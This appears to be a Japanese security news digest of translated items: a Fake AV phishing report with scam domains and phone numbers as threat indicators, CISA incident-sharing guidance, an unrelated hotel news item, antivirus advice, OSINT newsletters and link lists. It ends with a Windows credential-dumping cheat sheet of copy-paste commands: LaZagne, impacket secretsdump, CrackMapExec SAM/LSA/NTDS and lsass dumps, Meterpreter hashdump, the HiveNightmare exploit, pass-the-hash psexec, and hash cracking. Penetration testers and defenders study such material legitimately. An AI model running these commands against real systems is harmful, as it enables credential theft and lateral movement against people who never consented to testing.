2022年第1四半期のニセウイルス対策ソフト動向 / Fake AV phishing spikes in Q1 2022

2022年第1四半期にFake Anti-Virus (ニセウイルス対策ソフト)のフィッシングページの数が顕著に増加していることが判明しました。毎日行っているフィッシング詐欺のスキャンでは、これらの詐欺ページのソースコードに出くわすことは（あったとしても）ほとんどありません。しかし、今年の第1四半期だけで、WindowsとAppleデバイスのユーザーをターゲットにした50以上のサンプルを収集しました。

これまでに収集されたキットは、共通の開発テンプレートに緩く基づいていますが、フラットな検出に関しては、ややユニークさを保つために十分なバリエーションがあります。これらの詐欺のページに対するキットハンターの検出は、今朝早く更新されました。

ニセウイルス対策ソフト

ウイルス対策ソフトの詐欺ページは、Windows XPの時代から20年ほど前から存在しています。これらは、ブラックハットSEO詐欺と関連していることが多いのですが、これらのドメインへのリンクは、フォーラムやブログのコメント、インスタントメッセージ、ソーシャルメディアを介して共有されることもあるのです。

ブラックハットSEOとは、人気のある検索キーワードを利用して、悪意のあるページをSERP（検索エンジン結果ページ）の上位に表示させる詐欺のことです。今日でも、ブラックハットSEOの手口は、大きなニュースイベントやトレンドトピックに関連していることが一般的です。ブラウザベースの攻撃の全盛期には、ブラックハットSEOは、ソフトウェアの脆弱性を狙ってマルウェアを拡散したり、人々を騙して偽のAVページを読み込ませたりするために使用されていました。当時は、Internet Explorerや、Flash、Shockwave、PDFといったAdobe製品などがよく標的とされていました。

ニセウイルス対策（Fake AV）は、ソーシャル系詐欺のカテゴリーに属します。つまり、Fake AVはフィッシングの典型例ではないものの、スタイルや機能は似ているのです。

この詐欺の手口は、「技術的な理解不足」と「恐怖心」という2つの要素に依存しています。技術的な理解とは、コンピュータの操作やセキュリティに関する知識の欠如、およびサポートの仕組みに関する一般的な誤解を中心としたものです。恐怖の要素は単純で、これらの詐欺ページのポップアップや警告の多くは、システム感染やモラル（例：ポルノ）の暴露などを口実にしたものです。偽AVのページでは、開発者や詐欺の範囲によって、問題のある検出と暴露が混在していることがあります。

Fake AVページの攻撃形式はまちまちです。ある種のダウンロードやインストールを要求する詐欺もあれば、（最近観測されたような）サポートに「電話」して支援を受けるよう被害者に要求するものもあります。

インストーラーを要求している場合、詐欺師は何を出してくるかわかりません。感染したシステムからファイルや機密情報を取得するマルウェアであったり、被害者のシステムに持続的にアクセスするソフトウェアであったりする可能性があります。

被害者が画面に表示された番号に電話をかけると、個人情報や金銭的な情報が危険にさらされるだけでなく、詐欺師が被害者のシステムに追加のソフトウェアをインストールする機会を与え、被害者がさらなる攻撃や迷惑を被る可能性があります。

偽ウイルス対策ソフトの例

今期これまでにダウンロードされたキットに見られるバリエーションの一例として、最も一般的な3つのキットの概要を紹介します。図1に見られるように、トップのターゲットはWindowsユーザーです。

それぞれの詐欺の手口には共通点があります。

• 1つ目は、ブラウザのウィンドウが、感染症やマルウェアの種類にまで言及したポップアップ、アラート、警告で埋め尽くされることです。時には、ブラウザがフルスクリーンに押し出され、被害者はこの変更を元に戻すことが困難になります。
  
  

• Windowsをターゲットにした詐欺は、警告を引き起こすセキュリティメカニズムとしてWindows Defenderを活用します。Windows Defenderは有名なブランドであり、被害者がその名前をグーグルで検索した場合、これらの詐欺のページでその名前が使われることで、すぐに正当性を示すことができるようになっているのです。

• 多くのブラウザの要素が無効化されるため、被害者はブラウザの制御をある程度失う。機能や制御を回復することは問題です。これは、感染を再現するためのもので、意図的なものです。

• 最後に、このような詐欺のページでは、偽のマウスポインタが表示され、マウス機能が完全に無効になるか、いくらか妨げられるようになっています。このような場合、偽のマウスポインターは画面上を動き回ることになる。これも感染を装ったものである。

また、共通する要素として、言語の切り替えがあります。偽AV詐欺のページの多くには、画面に表示されるテキストを被害者の母国語で表示するコード要素が含まれています。この翻訳には多少の欠陥があり、ネイティブスピーカーにスクリプトを書かせるのではなく、翻訳サービスを利用したことがうかがえます。

脅威情報を以下に記します。また、技術者でない家族や友人には、これらの脅威について警告し、危険にさらされないようにしてください。

サポート詐欺電話番号：

(050) 5806-7793 

(050) 5534-0312

+1-507-889-1818 

+1(877) 337-3615 

+1-888-202-9313 

+1-(901)-810-3196 

ドメイン:

044lacked[.]ga 
124iteration[.]ga 
202configured[.]ga 
244iteration[.]ga 
303foeproweiw[.]ga 
388gwowowka[.]ga 
388hwpwodnf[.]ga 
487owppaasj[.]ga 
532gigabyte[.]ga 
588gwpwoek[.]ga 
935lacked[.]ga 
dbchebdjej[.]ga 
dhshdbwb[.]ga 
djrbrdeth[.]ga 
fhtvjdgjt[.]ga 
gr494lapeorwgr[.]ga 
hdbcgfnsnm[.]ga 
rl939malwaring[.]ga 
vhagyionvah[.]ga 
whfjgjg[.]ga 

---

039bapwpdk[.]ml 
042aoeowiwra[.]ml 
388daowpwiw[.]ml 
487hapqpwks[.]ml 
584lurking[.]ml 
638lapqkneps[.]ml 
689lurking[.]ml 
755gigabyte[.]ml 
ejgdhvdf[.]ml 
gr245gigabyte[.]ml 
ib309madenaing[.]ml 
nvbchdnvd[.]ml 
rw424bundling[.]ml 
yk498partically[.]ml 

---

alexacartbox[.]online 
balluthree[.]online 
ci48nco[.]online 
gloweranew[.]online 
greatofalltime[.]online 
lutinswipinfo[.]online 
msg67jp8[.]online 
onegoalsearch[.]online 
otherservicesdomains[.]online 
teamhourisimportant[.]online 

---

dfgjdfgjdf1[.]xyz 
dpillsnewgofit[.]xyz 
expediagrouping[.]xyz 
fghsdfghdgh7[.]xyz 
letmefityou[.]xyz 

---

cleaningkyotoservices[.]digital 
priceamazing[.]digital 
priceexcelsheet[.]digital 

---

3mjbfdmvn[.]shop 
claimeventgameterbaru[.]duckdns[.]org 
passagiert[.]cf 
rytjghsbdghjjh5[.]sbs 

出典：Fake AV phishing spikes in Q1 2022:

インシデント共有に関するガイダンス～共有すべき重要な要素は？～ / Guidance on Sharing Cyber Incident Information

CISAのSharing Cyber Event Information Fact Sheetは、異常なサイバーインシデントやアクティビティについて、何を共有すべきか、誰が共有すべきか、どのように共有すべきかについての明確なガイダンスと情報をステークホルダーに提供しています。 

CISAは、パートナーからのこれらの情報を利用して、敵対者がどのように米国のネットワークや重要インフラ分野を狙っているかについての共通認識を構築しています。この情報によって重要な情報格差が埋まり、CISAは攻撃に苦しむ被害者にリソースを迅速に配備して支援を提供し、セクターを超えて寄せられる報告を分析して傾向を把握し、その情報をネットワーク防御者と迅速に共有して他の潜在的被害者に警告を発することができるようになるのです。

■共有すべき重要な要素ベスト10

1. 事故発生日時 
2. 事故発生場所 
3. 観察された活動の種類 
4. 事象の詳細な説明 
5. 影響を受けた人またはシステムの数 
6. 会社名・団体名 
7. 連絡先詳細 
8. 事象の重大性 
9. 重要インフラ部門がわかっている場合
10. 他に知らせた人

出典：Guidance on Sharing Cyber Incident Information:

定額制回遊型住み替えサービス「TsugiTsugi」、対象宿泊施設拡大

東急は、定額制回遊型住み替えサービス「TsugiTsugi（ツギツギ）」の対象宿泊施設を全国の173軒のホテルに拡大した。

新たに、ドーミーイン、御宿 野乃、共立リゾート、JRイン、相鉄フレッサインの全国のチェーンホテルと、ホテル日航ノースランド帯広を追加した。これにより、全国37都道府県で展開することになる。

これまでは30泊限定で展開していたものの、13泊の「ライトプラン」を新設し、自宅とホテルの多拠点生活など、ライフスタイルに合わせた利用を可能とする。いずれのプランも同伴者1名まで無料。5月と6月利用分の利用者の募集を3月23日正午から開始しており、340名限定で受け付ける。

東急は2021年4月から、グループが運営する全国17都道府県の39軒のホテルを対象に「ツギツギ」のサービスを開始している。

出典：定額制回遊型住み替えサービス「TsugiTsugi」、対象宿泊施設拡大

ウイルス対策ソフトはどれが良い？

 

Windows10からWindows Defenderというウイルス対策ソフトが同梱されており、「これでいいんじゃね？」っていう声や相談をちらほら聞く。

実際のところ、どうなのだろうか？

答えは個人と法人で少し状況が異なる。

まず、個人については「OK」

無料なので、ウイルス検知の性能に不安を感じるかもしれないが、検知能力は有料のウイルス対策ソフトとそん色ない。

ちなみにウイルス対策ソフトの検知能力については下記のサイトで確認することができる。

AV-TEST

次に法人について。

法人は正直ケースバイケースとなる。

何がケースバイケースかというと、管理機能の要否で状況が変わってくるからである。

個人事業主や従業員数名クラスの会社はIT担当やセキュリティ担当なんて置けないので、必然的にウイルス対策ソフトの管理機能は不要となる⇒Windows DefenderでOK

一方、IT担当やセキュリティ担当を設置してしっかり管理しようとすると、管理機能の提供が無いWindows Defenderでは不都合が出てくる。

管理機能が無いとパターンファイルが更新されていない端末、ウイルス対策ソフトのバージョンが古いままの端末、ウイルス検知したものの事後処理が必要な端末の洗い出しができないのである。

ある程度の組織規模で、IT管理やセキュリティ管理に対して相応の責任を求められる企業においては、管理機能付きの有償のウイルス対策ソフトが必要となる。

週刊OSINT #2022-13 / WEEK IN OSINT #2022-13

短い更新ですが、共有したい素敵なものを見つけました。

ツールの使い方について、今号もそれを継続することにしました。ここではたくさんのことを共有していますが、それは最終手段です。なぜかというと、自分のすることすべてを理解する必要があるからです。もし、自分の発見を「売る」ことができなければ、また、ある情報をどこで見つけたかを明確に説明できなければ、他の誰かが再現したり、それを検証したりすることはできないでしょう。

• Using Tools - Part 2
• ICIJ Datashare
• UK Aerial Archive
• Reddit JSON
• RedditMetis

小技: Using Tools - Part 2

前号は、ツールを使うことの危険性についてお話しました。OSINTは画像プロバイダ、ソーシャルメディアプラットフォーム、IT関連情報のサイトなど、多くの外部プラットフォームに依存しているにもかかわらず、再びツールについて話したいと思います。なぜなら、毎号このニュースレターで紹介しているツールは、時にある種の欠点を伴うからです。その一つが、このツイートで明らかになりました。

すべての調査を手作業で行う場合、インターネットのどの部分にアクセスしたかを正確に把握することができます。しかし、調査においてサードパーティのツールに依存する場合、バックエンドがどのように設定され、どのソースに触れているか、どのようなデータセットが利用できるかが分からないと、調査中にすべての手段を使い切ったと言えるでしょうか？ある出来事、事件、人物について、非難または免責の証拠をすべて見つけたと、どうやって確認できるでしょうか？これが、私が調査のほとんどを手作業で行う理由の一つでもある。自分がどこにいて、何をしたかを知るだけでなく、自分がやったことを他の人が再現できるようにしたいのです。

話し合うための質問：ツールに関して問題があったことはありますか？例えば、結果が不完全であった、信頼できない、再現が不可能であったなどでしょうか？このエピソードを投稿したTwitterのスレッドに返信するか、The OSINT Curious Discordサーバーに行き、あなたの経験を共有するのはどうでしょう。

ツール: ICIJ Datashare

ツールの話をした直後に、最近偶然見つけたものを紹介します。まだじっくり見る時間がないのですが、大量のドキュメントを扱うときにはとても期待できそうです。ICIJ Datashareを使えば、大量のドキュメントを迅速かつ簡単にインデックス化し、検索することができます。ユーザーマニュアルによると、NLPを使った検索をする以外は、インターネットに接続する必要はないそうです。

サイト: UK Aerial Archive

先日、Steven 'Nixintel' Harrisが、歴史的な画像を豊富に含むサイトを紹介してくれました。40年代にRAFが撮影した写真から、現代の高解像度オブリガードまで、イギリスの多くのランドマークから撮影されている。時事問題や歴史問題で航空写真が必要な時には、素晴らしいサイトです。

サイト: RedditMetis

Discordサーバーで#redditチャンネルを見ていたら、@ohshint_さんのコメントにも、Redditツールへの便利なリンクがたくさんありました。そのうちのひとつが私の目に留まりました。RedditMetisです。このツールは、過去1000件の投稿やコメントを分析することで、あらゆるRedditユーザーを洞察することができます。

オマケ: It's a Passion

出典：Week in OSINT #2022-13

中国OSINTツールリンク「OSINT CHINE」 / OSINT CHINE created by Pangar-ban.

企業、税関、司法事例、土地証明書、公共交通機関など、中国に関する多くの貴重な情報資源があります。

OSINT CHINE - start.me

中国語ベースのOSINTツールリンク集 / OSINT开源情报与侦察工具

OSINTの諜報・偵察ツールに関するオンラインリソースのスタートページで、牧狼人により作成されました。

OSINT开源情报与侦察工具 - start.me

Windowsのクレデンシャルダンプ / Windows — Credentials Dumping | by Karol Mazurek

Windowsの認証情報をダンプするための最新のツールやテクニックを紹介するチートシートです。

初めに

この記事では、Windowsのクレデンシャルダンプのための現在のツール＆テクニックを紹介します。非常に短く、チートシートスタイルで書かれています。主な目的は、コマンドを1つの場所に集約し、評価中にコピー＆ペーストできるようにすることです。この短い記事のボーナスとして、最後にはJohn The RipperとHashcatを使ってWindowsのハッシュをクラックするためのコマンドを見つけることができます。

ツール

1. LaZagne
2. Impacket
3. CrackMapExec
4. HiveNightmare (CVE-2021–36934)
5. Meterpreter — credential_collector
6. Meterpreter — smart_hashdump

コマンド

• よく使うソフトのパスワード検索:

laZagne.exe all

• 特定のファイルタイプに含まれるテキスト「パスワード」の手動検索:

findstr /si 'password' *.txt *.xml *.docx

• ターゲット上でエージェントを実行せずにリモートでハッシュダンプ:

impacket-secretsdump $domain/$user:$pass@$ip

• CMEを用いた様々なハッシュダンプ:
  (ユーザがローカルアカウントの場合、-local-auth オプションを使用します。)

crackmapexec smb $ip -u $user -p $pass --sam

crackmapexec smb $ip -u $user -p $pass --lsa

crackmapexec smb $ip -u $user -p $pass --ntds

crackmapexec smb $ip -u $user -p $pass --ntds vss

crackmapexec smb $ip -u $user -p $pass -M lsassy

crackmapexec smb $ip -u $user -p $pass -M wireless

crackmapexec smb $ip -u $user -p $pass -M handlekatz

crackmapexec smb $ip -u $user -p $pass -M nanodump

crackmapexec smb $ip -u $user -p $pass -M procdump

crackmapexec smb $ip -u $user -p $pass --laps

crackmapexec smb $ip -u $user -p $pass -M gpp_password

デフォルトの管理者名がadministratorでない場合は、オプションの後にユーザー名を追加します: --laps <name>.

• GPPの復号化:

gpp-decrypt $encrypted_password

• Meterpreterモジュール:
  (まず、lsass.exeプロセスに移行するのがよいでしょう)

migrate <id of lsass.exe>

run post/windows/gather/credentials/credential_collector

run post/windows/gather/smart_hashdump

CVE-2021-36934 (別名SeriousSam)

非管理者として任意のレジストリハイブを読み取ることができるようにするエクスプロイトです。

• SAM、SECURITY、SYSTEMのハイブダンプの取得:

.\HiveNightmare.exe

• これら3つのファイルをダウンロードし、ハッシュをダンプします。:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

• PSHtechniqueを使用してリモートシステムにログインします。:

impacket-psexec -hashes $hash $user@$ip

クラッキング

• LM

john --format=lm hash.txt

hashcat -m 3000 -a 3 hash.txt

• NTML

john --format=nt hash.txt

hashcat -m 1000 -a 3 hash.txt

• NTLMv1

john --format=netntlm hash.txt

hashcat -m 5500 -a 3 hash.txt

• NTLMv2

john --format=netntlmv2 hash.txt

hashcat -m 5600 -a 0 hash.txt

• Kerberos 5 TGS

john --format=krb5tgs hash.txt --wordlist=rockyou.txt

hashcat -m 13100 -a 0 hash.txt rockyou.txt

• Kerberos ASREP

john --format=krb5asrep hash.txt --wordlist=rockyou.txt

hashcat -m18200 hash.txt rockyou.txt

出典：Windows — Credentials Dumping | by Karol Mazurek